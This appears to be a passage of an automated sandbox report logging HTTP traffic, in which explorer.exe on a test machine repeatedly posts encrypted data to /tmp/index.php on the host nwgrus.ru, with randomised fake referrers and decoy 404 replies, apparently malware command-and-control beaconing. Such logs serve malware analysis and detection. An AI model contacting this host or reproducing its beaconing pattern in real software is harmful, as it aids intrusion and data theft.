Oct 3, 2024 12:27:39.650572062 CEST	133	OUT	Data Raw: 3b 6e 54 64 f5 c9 19 22 db ad b5 77 04 05 7e cb 0b 0d cf 91 6f 02 e6 15 00 7d 0b 93 48 c6 c1 19 9c 5f c3 5c 75 64 20 11 98 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0f 6b 2c 90 f5 76 0b 75 77 4f af 87 Data Ascii: ;nTd"w~o}H_\ud ? 9Yt M@NA -[k,vuwO8abXma[/i{1Uh5\|^
Oct 3, 2024 12:27:41.164438963 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Thu, 03 Oct 2024 10:27:40 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49743	58.151.148.90	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 12:27:41.174376011 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://jrsqrkoonpvkf.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 160 Host: nwgrus.ru
Oct 3, 2024 12:27:41.174412012 CEST	160	OUT	Data Raw: 3b 6e 54 64 f5 c9 19 22 db ad b5 77 04 05 7e cb 0b 0d cf 91 6f 02 e6 15 00 7d 0b 93 48 c6 c1 19 9c 5f c3 5c 75 64 20 11 98 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0c 6b 2c 90 f5 76 0b 75 3c 4c d3 b6 Data Ascii: ;nTd"w~o}H_\ud ? 9Yt M@NA -[k,vu<L]SWgb;]t5UVfV]<XT2#zB$E
Oct 3, 2024 12:27:42.739104986 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Thu, 03 Oct 2024 10:27:42 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49744	58.151.148.90	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 12:27:42.748956919 CEST	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://pqllteniaumhpux.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 159 Host: nwgrus.ru
Oct 3, 2024 12:27:42.748956919 CEST	159	OUT	Data Raw: 3b 6e 54 64 f5 c9 19 22 db ad b5 77 04 05 7e cb 0b 0d cf 91 6f 02 e6 15 00 7d 0b 93 48 c6 c1 19 9c 5f c3 5c 75 64 20 11 98 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0d 6b 2c 90 f5 76 0b 75 2c 42 f0 89 Data Ascii: ;nTd"w~o}H_\ud ? 9Yt M@NA -[k,vu,BLGpY\?l&c_cy/:U,_:Jp}Q
Oct 3, 2024 12:27:44.296719074 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Thu, 03 Oct 2024 10:27:43 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49745	58.151.148.90	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 12:27:44.307208061 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ksbeipjuadnqvhne.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 344 Host: nwgrus.ru
Oct 3, 2024 12:27:44.307208061 CEST	344	OUT	Data Raw: 3b 6e 54 64 f5 c9 19 22 db ad b5 77 04 05 7e cb 0b 0d cf 91 6f 02 e6 15 00 7d 0b 93 48 c6 c1 19 9c 5f c3 5c 75 64 20 11 98 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 02 6b 2c 90 f5 76 0b 75 54 26 c9 ab Data Ascii: ;nTd"w~o}H_\ud ? 9Yt M@NA -[k,vuT&0sf&^l^2qt<edzM(eP7=ibH!_X~.wT%yWD^wSd3KfiA?2G/
Oct 3, 2024 12:27:45.899676085 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Thu, 03 Oct 2024 10:27:45 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49746	58.151.148.90	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 12:27:45.911700964 CEST	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ikkkpskbtojtajm.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 209 Host: nwgrus.ru
Oct 3, 2024 12:27:45.911731958 CEST	209	OUT	Data Raw: 3b 6e 54 64 f5 c9 19 22 db ad b5 77 04 05 7e cb 0b 0d cf 91 6f 02 e6 15 00 7d 0b 93 48 c6 c1 19 9c 5f c3 5c 75 64 20 11 98 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 03 6b 2c 90 f5 76 0b 75 31 58 cf f6 Data Ascii: ;nTd"w~o}H_\ud ? 9Yt M@NA -[k,vu1X*~Nr\6?UREmGHP:Yak8Jp@Z@B%5d5=KrWQx-__,}
Oct 3, 2024 12:27:47.406816006 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Thu, 03 Oct 2024 10:27:47 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49747	58.151.148.90	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 12:27:47.415420055 CEST	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://tlcaywkjpltapmg.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 118 Host: nwgrus.ru
Oct 3, 2024 12:27:47.415435076 CEST	118	OUT	Data Raw: 3b 6e 54 64 f5 c9 19 22 db ad b5 77 04 05 7e cb 0b 0d cf 91 6f 02 e6 15 00 7d 0b 93 48 c6 c1 19 9c 5f c3 5c 75 64 20 11 98 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 00 6b 2c 90 f5 76 0b 75 41 53 ad 95 Data Ascii: ;nTd"w~o}H_\ud ? 9Yt M@NA -[k,vuAS*NYvDw0uP[
Oct 3, 2024 12:27:49.220580101 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Thu, 03 Oct 2024 10:27:48 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49748	58.151.148.90	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 12:27:49.229250908 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ljdtqpdqnfgadl.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 112 Host: nwgrus.ru
Oct 3, 2024 12:27:49.229268074 CEST	112	OUT	Data Raw: 3b 6e 54 64 f5 c9 19 22 db ad b5 77 04 05 7e cb 0b 0d cf 91 6f 02 e6 15 00 7d 0b 93 48 c6 c1 19 9c 5f c3 5c 75 64 20 11 98 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 01 6b 2c 90 f5 76 0b 75 77 06 d4 ad Data Ascii: ;nTd"w~o}H_\ud ? 9Yt M@NA -[k,vuwRxPg\|2<EmX
Oct 3, 2024 12:27:51.563879967 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Thu, 03 Oct 2024 10:27:51 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49749	58.151.148.90	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 12:27:51.572967052 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://fmsbxuxqcel.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 116 Host: nwgrus.ru
Oct 3, 2024 12:27:51.572989941 CEST	116	OUT	Data Raw: 3b 6e 54 64 f5 c9 19 22 db ad b5 77 04 05 7e cb 0b 0d cf 91 6f 02 e6 15 00 7d 0b 93 48 c6 c1 19 9c 5f c3 5c 75 64 20 11 98 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 06 6b 2c 90 f5 76 0b 75 7e 5e b7 99 Data Ascii: ;nTd"w~o}H_\ud ? 9Yt M@NA -[k,vu~^r^gbl1kU+Z7q+
Oct 3, 2024 12:27:54.543570042 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Thu, 03 Oct 2024 10:27:53 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49750	58.151.148.90	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 12:27:54.554745913 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://sjpwecfehtwlg.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 145 Host: nwgrus.ru
Oct 3, 2024 12:27:54.554778099 CEST	145	OUT	Data Raw: 3b 6e 54 64 f5 c9 19 22 db ad b5 77 04 05 7e cb 0b 0d cf 91 6f 02 e6 15 00 7d 0b 93 48 c6 c1 19 9c 5f c3 5c 75 64 20 11 98 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 07 6b 2c 90 f5 76 0b 75 34 02 a0 a7 Data Ascii: ;nTd"w~o}H_\ud ? 9Yt M@NA -[k,vu4bs#^qsGG9i\|h#]WcV%T#
Oct 3, 2024 12:27:56.427618027 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Thu, 03 Oct 2024 10:27:55 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Oct 3, 2024 12:27:56.711549044 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Thu, 03 Oct 2024 10:27:55 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49752	58.151.148.90	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 12:27:56.716701984 CEST	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://vvymdudugxqyqgd.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 171 Host: nwgrus.ru
Oct 3, 2024 12:27:56.716741085 CEST	171	OUT	Data Raw: 3b 6e 54 64 f5 c9 19 22 db ad b5 77 04 05 7e cb 0b 0d cf 91 6f 02 e6 15 00 7d 0b 93 48 c6 c1 19 9c 5f c3 5c 75 64 20 11 98 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 04 6b 2c 90 f5 76 0b 75 73 1e fd 99 Data Ascii: ;nTd"w~o}H_\ud ? 9Yt M@NA -[k,vusc^bcnYjF3uqL_+Ja\7N/_S3<,DU&j
Oct 3, 2024 12:27:58.367597103 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Thu, 03 Oct 2024 10:27:58 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49753	58.151.148.90	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 12:27:58.384233952 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://vctlwttuihixctye.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 269 Host: nwgrus.ru
Oct 3, 2024 12:27:58.384268999 CEST	269	OUT	Data Raw: 3b 6e 54 64 f5 c9 19 22 db ad b5 77 04 05 7e cb 0b 0d cf 91 6f 02 e6 15 00 7d 0b 93 48 c6 c1 19 9c 5f c3 5c 75 64 20 11 98 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 05 6b 2c 90 f5 76 0b 75 5e 0a df ee Data Ascii: ;nTd"w~o}H_\ud ? 9Yt M@NA -[k,vu^uXWN`"$z/*@^tB<;{z.,(</xwXO+"wcK3ZwOusC=4G8bg{)
